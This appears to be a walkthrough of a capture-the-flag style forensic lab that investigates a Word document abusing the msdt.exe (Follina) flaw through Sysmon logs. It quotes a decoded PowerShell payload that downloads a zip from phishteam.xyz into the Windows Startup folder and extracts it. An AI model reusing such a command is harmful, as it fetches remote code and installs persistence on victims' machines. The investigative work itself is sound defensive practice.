The user of this machine was compromised by a malicious document. What is the file name of the document?
- I filter for event ID 11 for this question for file creation and sort the time from the beginning. In the second event, we can see that there’s a file downloaded from chrome.
What is the name of the compromised user and machine?
Format: username-machine name
- We can see the machine name and username on the same output. Just use the format of what the question asked.
What is the PID of the Microsoft Word process that opened the malicious document?
- In the third event, go to details and hit XML view. You can see the PID there.
Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?
- We’re gonna use event ID 22 for DNS query and use Find to filter the PID 496.
What is the base64-encoded string in the malicious payload executed by the document?
-
Let’s get some information from our previous answer.
- PID 496
- Malicious DNS was found at 5:13:32. After this, what happened? We will focus on process creation at this time. But let’s see the timeframe of what happened without filtering Event ID
- Normally, the base64-encoded strings are used in the Process creation. It is invoked by a malicious document when it is executed. When we decrypt it in CyberChef, here’s the result
$app=[Environment]::GetFolderPath('ApplicationData');cd "$app\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"; iwr <http://phishteam.xyz/02dcf07/update.zip> -outfile update.zip; Expand-Archive .\\update.zip -DestinationPath .; rm update.zip;
What is the CVE number of the exploit used by the attacker to achieve a remote code execution?
Format: XXXX-XXXXX
-
I dug into the invoked executable files to see if we could find some details.
- msdt.exe → I’ve got some details with this one. Link here: https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
